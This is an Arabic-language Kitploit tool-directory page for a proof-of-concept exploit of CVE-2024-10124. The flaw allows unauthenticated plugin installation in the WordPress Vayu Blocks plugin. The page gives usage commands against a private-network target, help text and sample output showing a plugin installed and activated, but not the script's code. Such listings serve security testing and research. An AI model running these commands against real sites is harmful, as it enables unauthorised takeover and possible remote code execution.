Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10124-Poc | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-10124-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-10124-poc

CVE-2024-10124-Poc

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-10124-Poc

إن إضافة Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce في ووردبريس عرضة للتثبيت والتفعيل العشوائي غير المصرح به للإضافات بسبب عدم وجود فحص للصلاحيات في الدالة tp_install() في جميع الإصدارات حتى 1.1.1 وما يشملها. وهذا يتيح للمهاجمين غير المصادَق عليهم تثبيت وتفعيل إضافات عشوائية، وهو ما يمكن استغلاله لتحقيق تنفيذ التعليمات البرمجية عن بُعد إذا تم تثبيت وتفعيل إضافة أخرى عرضة للثغرة. تم تصحيح هذه الثغرة جزئيًا في الإصدار 1.1.1.

سيناريوهات مثال

التحقق من الثغرة

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version

سيتحقق هذا من إصدار إضافة vayu-blocks لتحديد ما إذا كان الموقع عرضة للثغرة.

تثبيت إضافة (افتراضي)

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress

سيؤدي هذا إلى تثبيت الإضافة الافتراضية hello-dolly.

تثبيت إضافة محددة

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name

سيؤدي هذا إلى تثبيت إضافة plugin_name على الموقع المستهدف.

root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL (e.g., http://192.168.100.74/wordpress)
  -p PLUGIN, --plugin PLUGIN
                        Plugin name (default: hello-dolly)
  --check-version       Check if the site is vulnerable based on plugin version

المخرجات

root@kitploit:~
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"

ملاحظة:

هذا السكربت مقدم للأغراض التعليمية فقط. المؤلف غير مسؤول عن أي أضرار ناتجة عن إساءة استخدام هذا السكربت.

تنزيل الأداة
🔍الأمرالوصفمثال
🌐-u or --urlتحديد عنوان URL المستهدف لموقع ووردبريس.-u http://192.168.100.74/wordpress
🔒--check-versionالتحقق مما إذا كان الموقع عرضة للثغرة بناءً على الإصدار.-u http://192.168.100.74/wordpress --check-version
⚙️-p or --pluginتحديد اسم الإضافة (الافتراضي هو hello-dolly).-u http://192.168.100.74/wordpress -p plugin_name